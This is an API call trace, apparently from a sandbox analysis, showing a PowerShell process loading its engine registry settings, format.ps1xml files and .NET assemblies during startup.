	[0529.100] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cfbc, lpData=0x1b836fc0, lpcbData=0x12cfb8*=0x56 | out: lpType=0x12cfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12cfb8*=0x56) returned 0x0
	[0529.100] CoTaskMemFree (pv=0x1b836fc0) 
	[0529.100] RegCloseKey (hKey=0x308) returned 0x0
	[0529.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0529.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0529.102] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x44375e9f, Data2=0xb345, Data3=0x40bb, Data4=([0]=0x94, [1]=0x3f, [2]=0x9d, [3]=0x14, [4]=0xfa, [5]=0x26, [6]=0xf, [7]=0x77))) returned 0x0
	[0529.103] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x8d79fd17, Data2=0xa31e, Data3=0x41c4, Data4=([0]=0xa4, [1]=0xd1, [2]=0xe0, [3]=0x16, [4]=0xa9, [5]=0x9d, [6]=0x71, [7]=0xb8))) returned 0x0
	[0529.104] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xf2a4dd01, Data2=0x5537, Data3=0x4be4, Data4=([0]=0x8d, [1]=0x1d, [2]=0xe9, [3]=0xc9, [4]=0xc1, [5]=0x7f, [6]=0x42, [7]=0xfb))) returned 0x0
	[0529.104] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x8a5173c9, Data2=0xb082, Data3=0x4357, Data4=([0]=0xb2, [1]=0xa2, [2]=0x8e, [3]=0x8d, [4]=0x17, [5]=0xdc, [6]=0xa2, [7]=0x3b))) returned 0x0
	[0529.104] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x8d20a5c7, Data2=0xefbc, Data3=0x40d0, Data4=([0]=0x94, [1]=0x29, [2]=0x7f, [3]=0x46, [4]=0xcd, [5]=0x4f, [6]=0x3b, [7]=0x6f))) returned 0x0
	[0529.104] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xc3f8ebda, Data2=0xa133, Data3=0x4df8, Data4=([0]=0x82, [1]=0x87, [2]=0x0, [3]=0x3b, [4]=0x6e, [5]=0xec, [6]=0x7f, [7]=0x7))) returned 0x0
	[0529.105] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0529.105] GetFileType (hFile=0x308) returned 0x1
	[0529.105] SetErrorMode (uMode=0x1) returned 0x1
	[0529.105] GetFileType (hFile=0x308) returned 0x1
	[0529.105] ReadFile (in: hFile=0x308, lpBuffer=0x3490448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3490448*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0529.106] ReadFile (in: hFile=0x308, lpBuffer=0x3490448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3490448*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0529.107] ReadFile (in: hFile=0x308, lpBuffer=0x3490448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3490448*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0529.107] ReadFile (in: hFile=0x308, lpBuffer=0x3490448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3490448*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0529.107] ReadFile (in: hFile=0x308, lpBuffer=0x3490448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3490448*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0529.108] ReadFile (in: hFile=0x308, lpBuffer=0x3490448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3490448*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0529.108] ReadFile (in: hFile=0x308, lpBuffer=0x3490448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3490448*, lpNumberOfBytesRead=0x12cfd8*=0xaca, lpOverlapped=0x0) returned 1
	[0530.234] ReadFile (in: hFile=0x308, lpBuffer=0x348fa7a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x348fa7a*, lpNumberOfBytesRead=0x12cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0530.234] ReadFile (in: hFile=0x308, lpBuffer=0x3490448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3490448*, lpNumberOfBytesRead=0x12cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0530.234] CloseHandle (hObject=0x308) returned 1
	[0530.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0530.235] SetErrorMode (uMode=0x1) returned 0x1
	[0530.235] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12cf80 | out: lpFileInformation=0x12cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0530.235] SetErrorMode (uMode=0x1) returned 0x1
	[0530.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0530.235] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d068 | out: phkResult=0x12d068*=0x308) returned 0x0
	[0530.236] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cfec, lpData=0x0, lpcbData=0x12cfe8*=0x0 | out: lpType=0x12cfec*=0x1, lpData=0x0, lpcbData=0x12cfe8*=0x56) returned 0x0
	[0530.236] CoTaskMemAlloc (cb=0x5a) returned 0x1b836fc0
	[0530.236] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cfbc, lpData=0x1b836fc0, lpcbData=0x12cfb8*=0x56 | out: lpType=0x12cfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12cfb8*=0x56) returned 0x0
	[0530.236] CoTaskMemFree (pv=0x1b836fc0) 
	[0530.236] RegCloseKey (hKey=0x308) returned 0x0
	[0530.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0530.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0530.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x12c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0530.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0530.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x12c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0530.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0530.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0530.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x12c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0530.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x12c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0530.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0530.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x12c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0530.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0530.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x12c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0531.268] VirtualQuery (in: lpAddress=0x12bb00, lpBuffer=0x12c9c0, dwLength=0x30 | out: lpBuffer=0x12c9c0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0531.268] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x8683af5b, Data2=0xab9, Data3=0x487b, Data4=([0]=0x91, [1]=0xc, [2]=0xbe, [3]=0xb9, [4]=0x69, [5]=0x3c, [6]=0xf4, [7]=0x3f))) returned 0x0
	[0531.269] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x8d7e13b4, Data2=0x9344, Data3=0x4296, Data4=([0]=0xb2, [1]=0x1, [2]=0x76, [3]=0xa7, [4]=0x13, [5]=0x56, [6]=0xbb, [7]=0xaa))) returned 0x0
	[0531.270] VirtualQuery (in: lpAddress=0x12bcb0, lpBuffer=0x12cb70, dwLength=0x30 | out: lpBuffer=0x12cb70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0531.271] VirtualQuery (in: lpAddress=0x12bcb0, lpBuffer=0x12cb70, dwLength=0x30 | out: lpBuffer=0x12cb70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0531.272] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xb5bb333, Data2=0x8df4, Data3=0x4027, Data4=([0]=0xbc, [1]=0xcd, [2]=0x0, [3]=0x13, [4]=0xb5, [5]=0xe7, [6]=0xae, [7]=0xac))) returned 0x0
	[0531.275] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xc8f746da, Data2=0x1855, Data3=0x4f3f, Data4=([0]=0xa5, [1]=0x2b, [2]=0xe, [3]=0xd4, [4]=0x47, [5]=0x82, [6]=0x7e, [7]=0xe3))) returned 0x0
	[0531.275] VirtualQuery (in: lpAddress=0x12bf00, lpBuffer=0x12cdc0, dwLength=0x30 | out: lpBuffer=0x12cdc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0531.275] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x64922378, Data2=0x3740, Data3=0x4848, Data4=([0]=0x94, [1]=0xee, [2]=0x14, [3]=0xd0, [4]=0x59, [5]=0x2e, [6]=0xde, [7]=0xb4))) returned 0x0
	[0532.223] VirtualQuery (in: lpAddress=0x12b570, lpBuffer=0x12c430, dwLength=0x30 | out: lpBuffer=0x12c430*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0532.223] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xfbf8f50b, Data2=0x4a97, Data3=0x4f57, Data4=([0]=0x95, [1]=0xb4, [2]=0x3a, [3]=0x76, [4]=0xe0, [5]=0x8f, [6]=0x49, [7]=0x44))) returned 0x0
	[0532.223] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xd7a7e586, Data2=0x5e10, Data3=0x4597, Data4=([0]=0x9c, [1]=0x56, [2]=0x90, [3]=0x4f, [4]=0x37, [5]=0xd8, [6]=0x66, [7]=0x93))) returned 0x0
	[0532.223] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e8
	[0532.223] GetFileType (hFile=0x2e8) returned 0x1
	[0532.223] SetErrorMode (uMode=0x1) returned 0x1
	[0532.223] GetFileType (hFile=0x2e8) returned 0x1
	[0532.223] ReadFile (in: hFile=0x2e8, lpBuffer=0x2de8df0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2de8df0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.224] ReadFile (in: hFile=0x2e8, lpBuffer=0x2de8df0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2de8df0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.225] ReadFile (in: hFile=0x2e8, lpBuffer=0x2de8df0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2de8df0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.225] ReadFile (in: hFile=0x2e8, lpBuffer=0x2de8df0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2de8df0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.225] ReadFile (in: hFile=0x2e8, lpBuffer=0x2de8df0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2de8df0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.225] ReadFile (in: hFile=0x2e8, lpBuffer=0x2de8df0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2de8df0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.225] ReadFile (in: hFile=0x2e8, lpBuffer=0x2de8df0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2de8df0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.225] ReadFile (in: hFile=0x2e8, lpBuffer=0x2de8df0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2de8df0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.226] ReadFile (in: hFile=0x2e8, lpBuffer=0x2de8df0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2de8df0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.227] ReadFile (in: hFile=0x2e8, lpBuffer=0x2de8df0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2de8df0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.227] ReadFile (in: hFile=0x2e8, lpBuffer=0x2de8df0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2de8df0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.227] ReadFile (in: hFile=0x2e8, lpBuffer=0x2de8df0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2de8df0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.227] ReadFile (in: hFile=0x2e8, lpBuffer=0x2de8df0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2de8df0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.227] ReadFile (in: hFile=0x2e8, lpBuffer=0x2de8df0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2de8df0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.227] ReadFile (in: hFile=0x2e8, lpBuffer=0x2de8df0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2de8df0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.228] ReadFile (in: hFile=0x2e8, lpBuffer=0x2de8df0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2de8df0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.228] ReadFile (in: hFile=0x2e8, lpBuffer=0x2de8df0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2de8df0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.228] ReadFile (in: hFile=0x2e8, lpBuffer=0x2de8df0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2de8df0*, lpNumberOfBytesRead=0x12cfd8*=0xbce, lpOverlapped=0x0) returned 1
	[0532.229] ReadFile (in: hFile=0x2e8, lpBuffer=0x2de8526, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2de8526*, lpNumberOfBytesRead=0x12cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0532.229] ReadFile (in: hFile=0x2e8, lpBuffer=0x2de8df0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2de8df0*, lpNumberOfBytesRead=0x12cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0532.229] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d068 | out: phkResult=0x12d068*=0x2e8) returned 0x0
	[0532.229] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cfec, lpData=0x0, lpcbData=0x12cfe8*=0x0 | out: lpType=0x12cfec*=0x1, lpData=0x0, lpcbData=0x12cfe8*=0x56) returned 0x0
	[0532.229] CoTaskMemAlloc (cb=0x5a) returned 0x376d70
	[0532.229] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cfbc, lpData=0x376d70, lpcbData=0x12cfb8*=0x56 | out: lpType=0x12cfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12cfb8*=0x56) returned 0x0
	[0532.229] CoTaskMemFree (pv=0x376d70) 
	[0532.229] RegCloseKey (hKey=0x2e8) returned 0x0
	[0532.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0532.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0532.231] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xd55b2708, Data2=0xad34, Data3=0x4fcc, Data4=([0]=0x88, [1]=0xb0, [2]=0xb7, [3]=0x8c, [4]=0x5c, [5]=0xda, [6]=0x6c, [7]=0x12))) returned 0x0
	[0532.231] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x2520b863, Data2=0x35b6, Data3=0x4d14, Data4=([0]=0x87, [1]=0x7f, [2]=0x23, [3]=0xf9, [4]=0xc7, [5]=0x7a, [6]=0x79, [7]=0x54))) returned 0x0
	[0532.231] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xd8318ae9, Data2=0xb3e5, Data3=0x4cb1, Data4=([0]=0xa6, [1]=0x7d, [2]=0x9b, [3]=0x80, [4]=0xd6, [5]=0xfb, [6]=0xe6, [7]=0xf))) returned 0x0
	[0532.231] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x6827f5ad, Data2=0xe371, Data3=0x4412, Data4=([0]=0xb8, [1]=0xb4, [2]=0xff, [3]=0x2f, [4]=0xfd, [5]=0xa4, [6]=0x68, [7]=0x85))) returned 0x0
	[0532.231] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x55800bd7, Data2=0x9e7, Data3=0x4524, Data4=([0]=0x9b, [1]=0xf1, [2]=0x7, [3]=0x25, [4]=0x7b, [5]=0xc4, [6]=0x8f, [7]=0x14))) returned 0x0
	[0532.231] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x164f06d9, Data2=0xba8f, Data3=0x4207, Data4=([0]=0xb1, [1]=0xe7, [2]=0xa3, [3]=0x46, [4]=0x7c, [5]=0xfe, [6]=0x4b, [7]=0x8b))) returned 0x0
	[0532.232] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xd0c2ec9b, Data2=0xcd0f, Data3=0x445f, Data4=([0]=0xba, [1]=0x5e, [2]=0x63, [3]=0xe8, [4]=0x3d, [5]=0x6, [6]=0x1e, [7]=0xd6))) returned 0x0
	[0532.232] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x689d9518, Data2=0xaaf2, Data3=0x45c2, Data4=([0]=0xb7, [1]=0x37, [2]=0xc4, [3]=0x65, [4]=0x74, [5]=0x48, [6]=0x7c, [7]=0xb3))) returned 0x0
